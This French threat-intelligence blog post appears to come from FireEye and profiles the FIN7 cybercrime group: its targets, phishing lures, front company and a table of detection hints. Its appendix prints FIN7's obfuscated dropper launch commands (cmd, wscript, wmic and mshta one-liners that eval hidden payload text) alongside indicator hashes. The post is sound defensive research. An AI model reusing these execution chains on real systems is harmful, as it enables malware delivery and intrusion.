Traque de FIN7 : à la poursuite d’une organisation secrète et insaisissable

Le 1er août dernier, le bureau du procureur général du district ouest de Washington a annoncé l’arrestation de trois cadres d’une organisation criminelle en rapport avec FIN7, un groupe dont nous surveillons l'activité depuis 2015. Artisans d'attaques soigneusement planifiées à l'encontre de plus de 100 entreprises, ces malfaiteurs sont membres d’une cybermafia financière parmi les plus actives de cette décennie. De nombreux acteurs de la sécurité ont baptisé cette organisation le « groupe Carbanak ». Pour notre part, nous pensons que FIN7 n’est pas exclusivement associé à la backdoor CARBANAK. Dans ce billet, nous passons en revue l’éventail des activités 'criminelles de FIN7. Au sommaire : innovations techniques, maîtrise de l’ingénierie sociale, exemples de campagnes récentes, utilisation d’un prestataire de sécurité comme société-écran, enseignements à retenir pour mieux se protéger à l'avenir. FireEye en profite également pour rappeler le contexte technique et historique, avant de livrer aux lecteurs quelques conseils pour traquer les comportements symptomatiques de FIN7 dans toute leur entreprise.

Tour d’horizon des activités de FIN7

Cette organisation criminelle se caractérisait par le ciblage persistant et le vol à grande échelle d’informations de carte de paiement sur des systèmes compromis. On sait par ailleurs qu'elle revendait au moins une partie de ces informations via une boutique très en vue sur le darknet. Mais les crimes de FIN7 se sont étendus bien au-delà du simple vol d’informations de cartes bancaires. Dans certains cas, lorsque le groupe ne parvenait pas à faire main basse sur les données chiffrées de cartes de paiement sur les systèmes de point de vente (chiffrement E2EE ou P2PE), il rebondissait en ciblant les départements financiers des entreprises compromises.

En avril 2017, FireEye a en outre signalé que  FIN7 avait envoyé des e-mails de spear-phishing à une multitude d’entreprises, prenant pour cible les salariés chargés des relations avec la SEC (Securities and Exchange Commission), équivalent américain de la commission des opérations en bourse . Ces personnes présentaient en effet un intérêt particulier aux yeux de FIN7, dans la mesure où leur position leur donnait accès à des informations hautement confidentielles, véritable sésame à des activités frauduleuses sur les marchés boursiers.

La diversification des tactiques de monétisation du groupe lui a permis de faire rage dans une diversité de secteurs, en plus de son métier traditionnel des cartes de paiement. Dans les attaques que FireEye attribue à FIN7, on ne s'étonnera donc pas de constater que les victimes ciblées aux États-Unis et en Europe évoluaient dans des domaines d’activité variés :

  • Restaurants
  • Hôtellerie
  • Casinos et jeu
  • Énergie
  • Finance
  • Hautes technologies
  • du stockage
  • Voyage
  • Éducation
  • Construction
  • Grande distribution
  • Télécommunications
  • Administrations et collectivités
  • Services aux entreprises

L’innovation, clé de la réussite de FIN7

Pendant son long travail d'observation des activités de FIN7, FireEye avaient pu constater sa capacité à rester maître du jeu et à échapper à toute détection. Pour nous, il ne faisait aucun doute que leurs tactiques innovantes étaient le signe d'une structure dotée de gros moyens humains et financiers. En avril 2017, par exemple, FireEye a publié un billet dans lequel nous expliquions comment les e-mails de spear-phishing attribués à FIN7 exploitaient des fichiers de liens masqués (extensions LNK) pour exécuter des fonctions VBScript par mshta.exe et contaminer la machine des victimes. Cette méthode tranchait avec les méthodes habituelles de FIN7, à savoir les macros Office piégées, tout en soulignant la capacité du groupe à échapper à la détection.

FireEye avait également signalé la présence de la backdoor CARBANAK comme outil post-intrusion destiné à s'établir durablement sur le réseau compromis et maintenir l’accès à l’environnement des entreprises victimes. Utilisée dans des attaques extrêmement fructueuses et sophistiquées dès 2013, CARBANAK est une vulnérabilité aujourd'hui bien connue. On estime que FIN7 a commencé à l’utiliser fin 2015, même si l’interconnexion des campagnes recourant à ce malware n’est pas clairement établie sur ces cinq dernières années. FIN7 se démarquait par la créativité des mécanismes de persistance utilisés pour lancer CARBANAK. Concrètement, le groupe employait une base de données de shims applicatifs, qui injectait un correctif malveillant en mémoire dans le processus du Gestionnaire de contrôle des services ("services.exe"), puis activait un processus CARBANAK. FIN7 recourait également à cette tactique pour installer un utilitaire de collecte d’informations de carte de paiement.

Autre signe particulier de FIN7 : l’usage intensif de certificats numériques. Naturellement, les instigateurs de ces attaques ont cherché à profiter de la légitimité que leur conféraient ces certificats. Grâce aux signatures numériques de leurs documents de phishing, backdoors et outils post-intrusion, FIN7 a pu contourner de nombreux contrôles de sécurité limitant l’exécution des macros dans les documents Office et les fichiers binaires non signés sur les systèmes approuvés.

Organisation

Pays

Numéro de série

E-mail

Korsar Travel TOV

UA

88:21:ac:7e:6c:da:11:00:1d:b3:d3:1a:16:c1:5c:26

korsartravel@bk.ru

Kaitschuck James

GB

30:2e:7f:14:3a:f3:f3:98:20:70:42:4e:ea:52:5d:d2

oliversoftware@hotmail.com

Park Travel

RU

4d:e2:87:56:98:bf:c7:74:a3:f3:47:d6:70:7c:9b:f0

inga@parktravel-mx.ru

Tableau 1 : Exemples de certificats de signature de code utilisés par FIN7

FIN7 a mis au point des techniques de furtivité à un rythme soutenu. Tout au long de l'année 2017, FIN7 a créé de nouvelles méthodes de dissimulation, allant même jusqu'à les modifier à une cadence journalière pour lancer des attaques visant une multitude de victimes. L’organisation criminelle testait régulièrement des documents de phishing aux formats DOC, DOCX et RTF sur des référentiels publics pour jauger les capacités de blocage des moteurs de détection statique. Elle a également développé un style inédit de dissimulation de payload, à savoir la substitution de chaînes natives de l’interpréteur 'de commandes de Windows (cmd.exe). La méthode était si novatrice que FireEye lui a même donné un nom" : « FINcoding »." Ces méthodes ont inspiré une analyse de la technique de dissimulation profonde par ligne de commande et la publication de l’outil 'Invoke-DOSfuscation par Daniel Bohannon. Les tableaux 2 et 3 recensent quelques échantillons et leurs techniques de dissimulation par ligne de commande.

FIN7 et ses techniques agressives d'ingénierie sociale

Au cours de ces trois années passées à répondre à une multitude de compromissions et à préparer des clients face à FIN7, FireEye a pu observer ses talents incontestables en ingénierie sociale. Utilisation de formulaires web pour le premier contact, ciblage et communication directe avec le gérant d'un magasin… les pirates ont fait preuve d’une imagination débordante. De fait, les capacités d’action de FIN7 s’étendent bien au-delà des systèmes informatiques de leurs cibles. FireEye est intervenu sur des incidents où FIN7 avait appelé les victimes avant de formuler une réclamation par Internet contenant des fichiers malveillants, mais aussi après l’envoi de ces documents de phishing pour s’assurer de leur bonne réception. Une méthode rudimentaire, mais audacieuse et redoutablement efficace.

L’expérience aidant, FIN7 a affiné ses subterfuges et modèles de phishing, le plus souvent envoyés à partir d’adresses de personnes et d’entreprises imaginaires mais très bien incarnées, voire parfois à partir d’adresses en apparence légitimes d'organismes publics. Ses opérations de phishing s'emparaient souvent de sujets urgents et de grande importance aux yeux des entreprises ciblées. Dans les points de vente, les gérants étaient contactés à propos d’articles perdus ou d’un « trop payé », ticket de caisse à l'appui. D’autres e-mails de phishing de FIN7 imitaient des commandes détaillées de repas ou des demandes de menus spéciaux pour les personnes soumises à des régimes particuliers.

Début 2017, une nouvelle tactique est apparue et a perduré pendant plus d’un an : FIN7 contactait des magasins et des sièges sociaux pour se plaindre d’intoxications alimentaires par le biais d’e-mails contenant des pièces jointes malveillantes. Surnommée « FINdigestion » par FireEye en interne, cette série de réclamations a progressivement dépassé le cadre de plaintes individuelles pour prendre la forme de soi-disant poursuites engagées par des organismes sanitaires publics, comme illustré à la Figure 1.


Figure 1 : E-mail de spear-phishing estampillé FDA

Il est intéressant de noter que l’activité de la backdoor BATELEUR, identifiée pour la première fois par Proofpoint en juillet 2017, utilise des images très bien travaillées, souvent créées dans Adobe Photoshop. FireEye soupçonne que cette activité provient d’un sous-groupe de FIN7. Dans cette même campagne de phishing, la pièce jointe malveillante de FIN7 présentait de fortes correspondances graphiques, comme illustré à la Figure 2.


Figure 2 : Pièce jointe de spear-phishing estampillée FDA

Pendant toute la durée des opérations, la conception des documents est restée très professionnelle, et le développement de fichiers de phishing s’est poursuivi en parallèle d'autres outils post-intrusion. Tout porte donc à croire que FIN7 s’appuyait sur une organisation criminelle dotée d'importantes ressources.

Traque des métadonnées

FireEye a suivi plusieurs des acteurs de FIN7 en analysant les métadonnées de types de fichiers d’intérêt forensique. Dans un précédent billet, nous expliquions que les fichiers LNK créés par FIN7 révélaient involontairement des informations précieuses sur leur environnement de développement.

Les fichiers LNK peuvent en effet contenir des métadonnées dévoilant les caractéristiques des systèmes sur lesquels ils ont été créés : chemins d’accès aux fichiers d’origine, numéros de série des volumes, adresses MAC et noms d’hôte. En examinant les valeurs des métadonnées LNK, nous pouvons souvent identifier des "« marques »", à savoir des valeurs uniques associées à certains développeurs et opérateurs de malwares.

Les métadonnées LNK de FIN7 montrent que les pirates utilisaient des machines virtuelles avec des noms d’hôte génériques tels que ANDY-PC ou USER-PC, ainsi que des noms d’hôte par défaut comportant la structure WIN-[A-Z0-9]{11} (p. ex. WIN-ABCDEFGH1JK).

FireEye a suivi plusieurs marques et indices de noms d’hôte et de chemins d’accès associés aux opérations de FIN7 pour établir des liens entre les foyers d’activité malveillante. Ces marques pouvaient être liées aux membres de FIN7 impliqués tant dans le développement que dans les aspects opérationnels de l’organisation. D’après les données techniques détaillées dans la partie Annexe technique, plusieurs personnages se distinguent :

  • "andy" / "andy-pc"
  • "Hass"
  • "jimbo"
  • "Константин" (Konstantin)
  • "oleg"

Cette analyse nous a permis de mieux comprendre les systèmes de FIN7 et de corréler l’activité des futures attaques aux différents personnages identifiés. De plus, l’analyse des métadonnées a facilité le traçage des fichiers générés par le groupe et l’exploitation des marques connues pour détecter d’autres méthodes d’attaque (connexions RDP directes ou accès par SMB) si le groupe changeait de tactiques, techniques et procédures (TTP).

Lecture vidéo des opérations de FIN7

Pendant l'intervention de nos spécialistes sur plusieurs intrusions de FIN7, FireEye a récupéré un programme d’enregistrement vidéo qu’utilisait FIN7 pour ses opérations. Après avoir recréé le protocole vidéo par rétroingénierie, l’équipe FLARE de FireEye en a conclu qu'il avait été créé spécialement par FIN7 : aucune dépendance à des bibliothèques externes, commentaires en cyrillique dans le code et lecteur vidéo spécial que seul FIN7 utilise. Très vraisemblablement, les pirates utilisaient cette fonction d’enregistrement vidéo pour surveiller les environnements infiltrés et renseigner les étapes suivantes de leurs attaques.

FireEye a obtenu de sources sûres une version du lecteur vidéo des développeurs criminels. Connaissant le protocole par rétroingénierie, l’équipe FLARE a modifié le code source pour qu’il prenne en charge plusieurs versions de l'encodage personnalisé de FIN7. Dès lors que les victimes concernées sont en possession de ces fichiers, FireEye peut ainsi décoder et lire la surveillance vidéo de FIN7.

Récentes évolutions dans le mode opératoire de FIN7

Tout au long de l’année 2018, FireEye a continué d’identifier de nombreux domaines enregistrés selon un mode opératoire rappelant les activités passées de FIN7, mais aussi des campagnes dont les diverses techniques, tactiques et procédures (TTP) ont été attribuées à FIN7 avec plus ou moins de certitude. Des archives ZIP contenant la backdoor BIRDDOG étaient hébergées sur une partie des domaines FIN7 présumés, enregistrés en 2018. Certains indices caractérisant plus précisément la nature de cette campagne laissent à penser que ces documents malveillants étaient envoyés aux clients d’établissements financiers en Europe de l’Est et en Asie centrale dès septembre 2017. Le ciblage d’individus, au lieu d’entreprises, marquerait un tournant radical de leur stratégie, bien que les banques usurpées dans ces campagnes aient en fait pu constituer les cibles finales de 'FIN7.

Par ailleurs, nous avons identifié des similitudes entre l’activité de FIN7 et les campagnes BATELEUR, des attaques ciblant principalement des chaînes de restauration américaines dès la mi-2017. Ces campagnes s'appuyaient sur des documents Word contenant des macros jointes directement aux e-mails ou hébergés sur Google Drive. Élaborés avec le plus grand soin, ces documents ressemblaient à s'y méprendre à des documents officiels d'organisations diverses (associations d’entreprises de la restauration, revendeurs d’équipements pour points de vente, etc.). Cette activité présumée de FIN7 s’est poursuivie après les récentes arrestations annoncées par les autorités américaines, même si les attaquants utilisent désormais une nouvelle backdoor JavaScript baptisée GRIFFON.

Ces récentes campagnes pourraient traduire un effort de diversification des TTP pour échapper à la détection, voire signaler la formation de groupes satellites de FIN7 menant séparément leurs propres campagnes. Dans tous les cas, les entreprises doivent rester extrêmement vigilantes et attentives aux changements dans les méthodes employées par les acteurs de FIN7.

Découverte de la société-écran et des domaines d’activité de FIN7


Figure 3 : Logo de Combi Security, tel que récupéré dans le cache du site combisecurity.com en 2016.

D’après les autorités judiciaires américaines, une partie de l’activité de FIN7 se serait déroulée depuis une société-écran dénommée Combi Security. Un cache de son site web révèle que l’entreprise prétendait être « le leader mondial de la protection des grands systèmes d'information face aux cybermenaces modernes », avec des bureau à Moscou, Haïfa et Odessa. Nous avons retrouvé des offres d’emploi de Combi Security sur des sites d’annonces russes, ukrainiens et ouzbèks bien connus, ainsi que de nombreux individus qui, selon toute vraisemblance, travaillaient pour l’entreprise. Étant donné l’authenticité apparente de ces offres d’emploi, il est probable que certains salariés n’avaient pas saisi le caractère illégal de leurs missions. Certes, le recrutement de personnes peu méfiantes comme marionnettes est une méthode courante pour certaines organisations criminelles pratiquant le « reshipping scam » : les « mules » de réacheminement sont recrutées au travers d’offres attrayantes de travail à domicile publiées sur des sites d’annonces. Mais la conduite d’escroqueries financières à grande échelle sous couvert de missions de cybersécurité sort vraiment de l'ordinaire. Le succès apparent de Combi Security pour recruter des individus peu soupçonneux pourrait faire des émules dans le milieu de la cybercriminalité.

Éclatement en sous-groupes ?

Outre les individus récemment appréhendés, l’organisation criminelle qui se cache derrière FIN7 compte presque certainement de nombreux autres cadres. FireEye iSIGHT Intelligence s'attend à ce qu’au moins une partie d'entre eux poursuivent leurs activités criminelles d’une manière ou d’une autre. Malgré cela, il y a fort à parier qu’ils changent leurs TTP ou cessent provisoirement leur activité, comme c'est souvent le cas après des événements d’importance comme l’arrestation de chefs de l’organisation et/ou la divulgation publique des TTP utilisées.

En fonction de la structure et des modes de communication du groupe, il est également probable que plusieurs sous-groupes se forment pour mener des opérations chacun de leur côté. Les campagnes récentes, y compris celles dont les tactiques contrastent avec les méthodes historiques de FIN7 (campagnes SEC à grande diffusion, etc.), pourraient être le signe d'une organisation en groupes semi-autonomes préexistants au sein de FIN7. Comme nous l'évoquions dans notre présentation de CARBANAK, certaines familles et techniques de malwares ne sont pas strictement représentatives d’un groupe criminel particulier. Elles peuvent en effet être recyclées par les développeurs et les opérateurs au gré de leurs changements de groupe ou de campagne.

Conclusion

Les récentes arrestations annoncées par les autorités judiciaires américaines soulignent les synergies d'une action commune des acteurs privés et publics pour faire échec aux organisations cybercriminelles. Comme le démontre le groupe FIN7, les protagonistes du cybercrime financier sont aujourd'hui en capacité d’infliger des dégâts considérables au travers de vastes campagnes soigneusement orchestrées. Alors que des groupes de très haut niveau continuent de voir le jour, les partenariats public-privé sont appelés à jouer un rôle majeur dans la lutte contre ces menaces.

Remerciements

Jordan Nuce, Tom Bennett, Michael Bailey et Daniel Bohannon

Annexe technique

FireEye est intervenu sur de nombreux incidents imputés à FIN7, ce qui nous a permis de tirer de riches enseignements sur les opérations du groupe. Dans ce billet, nous recensons également les nombreux indicateurs que nous attribuons à FIN7, assortis d’une présentation des techniques utilisées. Nous comptons ainsi aider les entreprises à identifier plus facilement toute activité malveillante sur leur réseau.

Détails techniques des documents de phishing

Outre les métadonnées des fichiers LNK, les documents de phishing de FIN7 contenaient souvent des éléments détaillant les chemins d’accès locaux de fichiers servant à leur création. Dans les tableaux suivants, nous avons également inclus des exemples de la multitude de techniques de dissimulation par ligne de commande employées par FIN7. Il est intéressant de noter la proximité chronologique entre des documents employant des techniques différentes.

Date de création EXIF

Auteur

Malware

MD5

Nom de fichier

2018:05:21 17:32:00

FIN7 présumé

GRIFFON

7e703dddcfc83cd352a910b48eaca95e

 

C:\Users\jimbo\Desktop\Files\Картинки\outlook2.png

cmd.exe /k "SET a01=wscr& SET a02=ipt&&call %a01%%a02% /e:jscript //b %TEMP%\errors.txt

Date de création EXIF

Auteur présumé

Malware

MD5

Nom de fichier

2018:01:26 15:59:00

FIN7 présumé

BATELEUR

bb1a76702e2e7d0aa23385f24683d214

Doc1.doc

C:\Users\Hass\Desktop\Картинки\New\outlook3.png

cmd.exe /c wscript.exe //b /e:jscript %TEMP%\crashpad.ini

Date de création EXIF

Auteur présumé

Malware

MD5

Nom de fichier

2018:01:11 13:16:00

FIN7 présumé

BATELEUR

5972597b729a7d2853a3b37444e58e01

check.doc

C:\Users\Hass\Desktop\Картинки\New\outlook2.png

cmd.exe /c wscript.exe //b /e:jscript %TEMP%\crashpad.ini

Date de création EXIF

Auteur présumé

Malware

MD5

Nom de fichier

2017:10:25 07:43:00

FIN7 présumé

BATELEUR

c4aabdcf19898d9c30c4c2edea0147f0

document1.doc

C:\Users\oleg\Desktop\Файлы\Картинки\New\defender.jpg

cmd.exe /c wscript.exe //b /e:jscript %TEMP%\crashpad.ini

Date de création EXIF

Auteur présumé

Malware

MD5

Nom de fichier

2017:06:23 15:18:00

FIN7 présumé

BATELEUR

467062d2a5a341716c42c6d7f36ba0ed

check.doc

C:\Users\Work\Desktop\IMAGES\outlook2.png

wscript.exe //b /e:jscript %TEMP%\debug.txt

Tableau 2 : Paramètres de lancement d'une campagne de spear-phishing, vraisemblablement d’origine FIN7, et traces du système local des attaquants

Date de création EXIF

Auteur présumé

Malware

MD5

Nom de fichier

2017:10:06 11:21:00

FIN7

HALFBAKED

29a3666cee0762fcd731fa663ebc0011

Doc0610.docx

C:\Users\andy\Desktop\unlock.cmd

cmd /c ""%TMP%\unlock.cmd" "

@set w=wsc@ript /b /e:js@cript %HOMEPATH%\tt.txt
@echo try{var fs=new ActiveXObject('Scripting.FileSystemObject');sh=new ActiveXObject('Wscript.Shell');p=sh.ExpandEnvironmentStrings('%%HOM'+'EPATH%%')+'\\pp.txt';var f=fs.OpenTextFile(p,1,false);for(i=0;i^<4;i++)f.SkipLine();var com='';while(!f.AtEndOfStream)com+=f.ReadLine().substr(1);f.Close();try{fs.DeleteFile(p, true);}catch(e){}this[String.fromCharCode(101)+'v'+'al'](com);}catch(e){}; >%HOMEPATH%\tt.txt
@copy /y %TMP%\unlock.cmd %HOMEPATH%\pp.txt
@echo %w:@=%|cmd

Date de création EXIF

Auteur présumé

Malware

MD5

Nom de fichier

2017:09:27 11:56:00

FIN7

HALFBAKED

6146a18570e134c6c32633aca14375fb

Doc2709.docx

C:\Users\usr\Documents\send\270917\unlock.doc.lnk

wmic.exe process call create "cmd start /min cmd /c for /f \"usebackq delims=\" %x in (`FindStr /R /C:\"@#[0-9]#@\" \"%TEMP%\unlock.doc.lnk\"`) do %x|cmd >nul 2>&1 &"

cmd.exe /S /D /c" echo /*@#8#@*/try{sh=new ActiveXObject("Wscript.Shell");fs=new ActiveXObject("Scripting.FileSystemObject");p=sh.ExpandEnvironmentStrings("%TM"+"P%");f=fs.GetFile(p+"//unlock.doc.lnk");s=f.OpenAsTextStream(1,0);c=s.Read(2403);c=s.ReadAll();s.Close();this[String.fromCharCode(101)+'va'+'l'](c);}catch(e){} >%HOMEPATH%\t.txt  & wscript //b /e:jscript %HOMEPATH%\t.txt  >nul 2>&1 &"

Date de création EXIF

Auteur présumé

Malware

MD5

Nom de fichier

2017:08:08 17:38:00

FIN7

HALFBAKED

03e85ad4217775906e6b5ceae8dc27af

Doc_n0908.rtf

C:\Users\andy\Desktop\unlock.doc.lnk

wmic.exe process call create "mshta javascript:eval(\"try{eval('wall=GetObject(\\'\\''+String.fromCharCode(44)+'\\'Word.Application\\')');eval(wall.ActiveDocument.Shapes(2).TextFrame.TextRange.Text);}catch(e){};close();\")"

mshta.exe "try{jelo = 'try{w=GetObject("","Wor"+"d.Application");this[String.fromCharCode(101)+\\'va\\'+\\'l\\'](w.ActiveDocument.Shapes(1).TextFrame.TextRange.Text);}catch(e){};';var fso = new ActiveXObject("Scripting.FileSystemObject");var sh = new ActiveXObject("Wscript.Shell");var p = sh.ExpandEnvironmentStrings("%HOMEPATH%") + "\\\\jelo.txt""

Date de création EXIF

Auteur présumé

Malware

MD5

Nom de fichier

2017:07:27 15:51:00

FIN7

HALFBAKED

63e2eb258a85ed4e72f951cdbff2a58e

Dooq.docx

C:\Users\jinvr-3-1\Desktop\unlock.doc.lnk

cmd.exe /C set x=wsc@ript /e:js@cript %HOMEPATH%\ttt.txt & echo try{w=GetObject("","Wor"+"d.Application");this[String.fromCharCode(101)+'va'+'l'](w.ActiveDocument.Shapes(2).TextFrame.TextRange.Text);}catch(e){}; >%HOMEPATH%\ttt.txt & echo %x:@=%|cmd

Date de création EXIF

Auteur présumé

Malware

MD5

Nom de fichier

2017:06:28 16:21:00

FIN7

HALFBAKED

22ad7c05128ca7b48b0a2a4507803b16

Doc0507.rtf

C:\Users\andy\Desktop\unprotect.rtf.lnk

cmd.exe /C set x=wsc@ript /e:js@cript %HOMEPATH%\md5.txt & echo try{w=GetObject("","Wor"+"d.Application");this[String.fromCharCode(101)+'va'+'l'](w.ActiveDocument.Shapes(1).TextFrame.TextRange.Text);}catch(e){}; >%HOMEPATH%\md5.txt & echo %x:@=%|cmd

Date de création EXIF

Auteur présumé

Malware

MD5

Nom de fichier

2017:05:11 12:59:00

FIN7

HALFBAKED
BEACON

99975b5ee2ddd31e89c9bdda7a3871d9

Doc1.docx

C:\Users\user\Documents\unprotect.lnk

C:\WINDOWS\system32\mshta.exe vbscript:Execute("On Error Resume Next:set yjdsqjtrn=GetObject(,""Word.Application""):execute yjdsqjtrn.ActiveDocument.Shapes(2).TextFrame.TextRange.Text:close")

Date de création EXIF

Auteur présumé

Malware

MD5

Nom de fichier

2017:04:20 16:27:00

FIN7

HALFBAKED
BEACON

42a2a2352f6b1f5818f3b695f240fc3a

info.rtf

C:\Users\testadmin.TEST\Desktop\unprotect.lnk

C:\WINDOWS\system32\mshta.exe vbscript:Execute(&quot;On Error Resume Next:set wprotect=GetObject(,&quot;&quot;Word.Application&quot;&quot;):execute wprotect.ActiveDocument.Shapes(1).TextFrame.TextRange.Text:close&quot;)

Date de création EXIF

Auteur présumé

Malware

MD5

Nom de fichier

2017:01:12 18:00:00

FIN7

HALFBAKED
BEACON
BELLHOP

cea2989309ccd5128f437335622978f1

order.rtf

C:\Users\testadmin.TEST\Desktop\unprotected.vbe
C:\Users\tst01\Desktop\unprotected.vbs

%WINDIR%\System32\Wscript.exe %TEMP%\WindowsUpdate_X24532\beginer.vbs

Date de création EXIF

Auteur présumé

Malware

MD5

Nom de fichier

2016:08:12 11:26:00

FIN7

HALFBAKED

fbf653b89a0814f515ddbdcf82cc3795

Reservation - Copy.docx

C:\Users\test\Documents\sploits\120816\order.vbe

%WINDIR%\System32\Wscript.exe %TEMP%\AdobeUpdateManagementTool.vbs

Tableau 3 : Paramètres de lancement d'une campagne de spear-phishing d’origine FIN7 et traces du système local des attaquants

Tactiques, techniques et & procédures (TTP) de FIN7

FireEye fournit ici des informations sur les méthodologies caractéristiques de FIN7 aux différentes étapes du cycle d’attaque, ainsi que des renseignements visant à faciliter l'identification de traces d'activités suspectes identiques ou comparables dans votre environnement.

Étape du cycle d’attaque

Méthodologie d’attaque

À examiner

Compromission initiale

E-mails de spear-phishing envoyés par PHP Mailer

E-mails entrants contenant des métadonnées de type « X-Mailer: PHPMailer »

Implantation

Persistance à l’aide des clés de registre Run et Run Once

Nouvelles entrées de registre Run et RunOnce référençant .VBS et .VBA

Implantation

Exécution ou persistance à l’aide de Tâches planifiées

Nouvelle Tâche planifiée référençant .CMD, .LNK, .VBS, .VBA, .PS1 et d’autres extensions de langage de script

Implantation

Persistance à l’aide des services Windows et du répertoire de démarrage

Nouveaux services Windows, nouveaux fichiers dans les répertoires de démarrage (Startup)

Implantation

Persistance à l’aide d’AppCompat Shim

Nouveaux fichiers de base de données de shims (SDB) et modifications des clés de registre AppCompatFlags (voir le billet sur la persistance SDB selon FIN7)

Maintien d'une présence

C2 (commande et contrôle) avec ports C2 définis

Connexions sortantes avec différences port-protocole sur des ports courants comme 53, 80, 443, 8080

Maintien d'une présence

C2 (commande et contrôle) avec des domaines de 3e niveau génériques

Connexions sortantes ou résolutions DNS vers des domaines de 2"e" niveau rudimentaires avec des domaines de 3e niveau génériques tels que mail, www1, www2, dns, ftp (ex. : « mail[.]qefg[.]info »)

Maintien d'une présence

C2 à l’aide d’une infrastructure VPS de faible réputation

Connexions entrantes et sortantes depuis/vers des plages d’adresses IP non standard, en particulier depuis les fournisseurs internationaux de VPS (Virtual Private Server)

Maintien d'une présence

C2 en utilisant des services légitimes, dont Google Docs, Google Scripts et Pastebin

 

Maintien d'une présence

C2 en utilisant DNS via des enregistrements A, OPT, TXT

Requêtes d’enregistrements DNS A, TXT et OPT anormalement longues ou nombreuses

Maintien d'une présence

Domaines de C2 enregistrés auprès de REG.RU

Nouveaux domaines enregistrés via REG.RU

Maintien d'une présence

Domaines de C2 enregistrés auprès de NameCheap

Nouveaux domaines enregistrés via NameCheap

Maintien d'une présence

Domaines de C2 enregistrés sous forme inhabituelle et avec des domaines de premier niveau

Requêtes DNS exceptionnellement longues ou nombreuses, selon la structure [a-zA-Z]{4,5}\.[pw|us|club|info|site|top] (ex. : « pvze[.]club »)

Maintien d'une présence

Domaines de C2 enregistrés avec un tiret

Connexions sortantes vers des domaines récemment enregistrés et portant un tiret

Tableau 4 : FIN7 TTPs

Indicateurs de FIN7

FireEye publie ces indicateurs techniques détaillés pour aider toutes les personnes intéressées à mieux cerner les auteurs de la menace et à rechercher l’historique de leurs activités sur les réseaux d’entreprise.

Droppers dans les documents de phishing

Nom de fichier

MD5

Auteur présumé

Malware

menu.rtf

c14eb54769ff208a2562e4ef47958d9e

FIN7

 

 

76eb6f124fba6599a54e92b829c55b63

FIN7

BEACON

3-ThompsonDan.rtf

4b783bd0bd7fcf880ca75359d9fc4da6

FIN7

BEACON
BELLHOP
HALFBAKED

claim.rtf

af53db730732aa7db5fdd45ebba34b94

FIN7

BEACON
BELLHOP
HALFBAKED

order.rtf

cea2989309ccd5128f437335622978f1

FIN7

BEACON
BELLHOP
HALFBAKED

order.rtf

cf4ccb3707e5597969738b4754782e4d

FIN7

BEACON
BELLHOP
HALFBAKED

Doc2_rtf.rtf

2dc0f4bece10759307026d90f585e006

FIN7

BEACON
HALFBAKED

doc1.doc

37759603c6cd91ebc8a1ea9ac0f2d580

FIN7

BEACON
HALFBAKED

quote.rtf

3c0bd71e91e0f18621ba43de4419f901

FIN7

BEACON
HALFBAKED

Doc2_rtf.rtf

562a64f1c09306d385962cf8084b6827

FIN7

BEACON
HALFBAKED

information.doc

5dace5ac5ba89c9bba4479264f75b2b6

FIN7

BEACON
HALFBAKED

Doc_rest_rtf.rtf

619aa4e6c9db275381ab0e7fc7078f5f

FIN7

BEACON
HALFBAKED

doc1.docx

67c9bfd4d6ac397fb0cd7da2441a6fe2

FIN7

BEACON
HALFBAKED

Doc33.docx

6a5a42ed234910121dbb7d1994ab5a5e

FIN7

BEACON
HALFBAKED

info_.rtf

6ac5ae6546746e3a9502cc489b71146e

FIN7

BEACON
HALFBAKED

bmg.docx

754fc509328af413d93131e65fc46d31

FIN7

BEACON
HALFBAKED

Doc_0405_1.rtf

7b2315ff1f2d763857aa70ad34b75449

FIN7

BEACON
HALFBAKED

doc1.docx

99975b5ee2ddd31e89c9bdda7a3871d9

FIN7

BEACON
HALFBAKED

doc0505_1.rtf

9eb71edd5ec99294a1c341efa780b1b1

FIN7

BEACON
HALFBAKED

DonovanR.docx

b5829caad7c448c558cb1dab2d9f4320

FIN7

BEACON
HALFBAKED

rising star.rtf

c8b8420d1503ae48ff35362f5d29eeb3

FIN7

BEACON
HALFBAKED

inf6.docx

e494356fc0db7ef6009d29e5ae869717

FIN7

BEACON
HALFBAKED

Claim.docx

06b9e2fdd2c0eeb78b851c93ca66f25f

FIN7

BELLHOP

order.rtf

80eed9f87a18b0093eb3f16fa495b6f7

FIN7

BELLHOP

Details Joseph.docx

b4d48f3e1ae339f2fcb94b7abceecfff

FIN7

BELLHOP

order.doc

e2a6b351c276d02d71e18cd0677e8236

FIN7

BELLHOP
HALFBAKED

 

b14bc8cbc7f2d36179ebff96ade6d867

FIN7

CARBANAK

features.doc

bbd99ef280efebe9066c0aef91bf02cd

FIN7

DRIFTPIN
HALFBAKED

doc2709.rtf

01d666fcbc4cdcedbfe7963f498e7858

FIN7

HALFBAKED

doc_n0908.rtf

03e85ad4217775906e6b5ceae8dc27af

FIN7

HALFBAKED

doc1.docx

0d6619481cfd29791a51ebb42ace5c03

FIN7

HALFBAKED

doc1.rtf

0e0a51489054529a9dcb177d39f08b81

FIN7

HALFBAKED

doc0719.docx

101bdbbd99cfd74aa5724842404642f2

FIN7

HALFBAKED

doc0507.docx

17fabe288d640476a70154c59d5a1ba1

FIN7

HALFBAKED

info_1.rtf

189c5a090d2b3b87ab65a8b156cd971e

FIN7

HALFBAKED

doc.docx

1a6c18967f4ce1c91c77098af4957e6e

FIN7

HALFBAKED

Mail.rtf

1a9e113b2f3caa7a141a94c8bc187ea7

FIN7

HALFBAKED

Doc_rest_n_rtf.rtf

1f5022a02c82fbe414dc91bf3f1b5180

FIN7

HALFBAKED

doc.docx

1f98c4ff12fc2c6fbf8247a5b2e4e7f4

FIN7

HALFBAKED

doc1909.docx

1fbe77a3b5771ce4f95e02a49c5b7f30

FIN7

HALFBAKED

doc_n0808.rtf

21926646a658bdf39cf28cdfbb1aced7

FIN7

HALFBAKED

doc0507.rtf

22ad7c05128ca7b48b0a2a4507803b16

FIN7

HALFBAKED

Doc2.docx

22e7d4f7401ef34b3b6d17c15291c497

FIN7

HALFBAKED

menu.rtf

24fab1e9831e57307d17981abaabf960

FIN7

HALFBAKED

2-order.docx

28ad8e3a225400a1d00f6023f8e6c9c8

FIN7

HALFBAKED

doc0610.docx

29a3666cee0762fcd731fa663ebc0011

FIN7

HALFBAKED

doc2209_1.rtf

2d36634974c85eff393698b39edc561c

FIN7

HALFBAKED

Doc1.rtf

307a9ce257e97189e046fa91d3c27dab

FIN7

HALFBAKED

doc1.rtf

325844f1b956c52fc220932bc717f224

FIN7

HALFBAKED

doc0910.rtf

3917028799d2aa3a43ec5bad067e99a5

FIN7

HALFBAKED

doc1.docx

397d45b6001919b04739e26379c84dd9

FIN7

HALFBAKED

docr.rtf

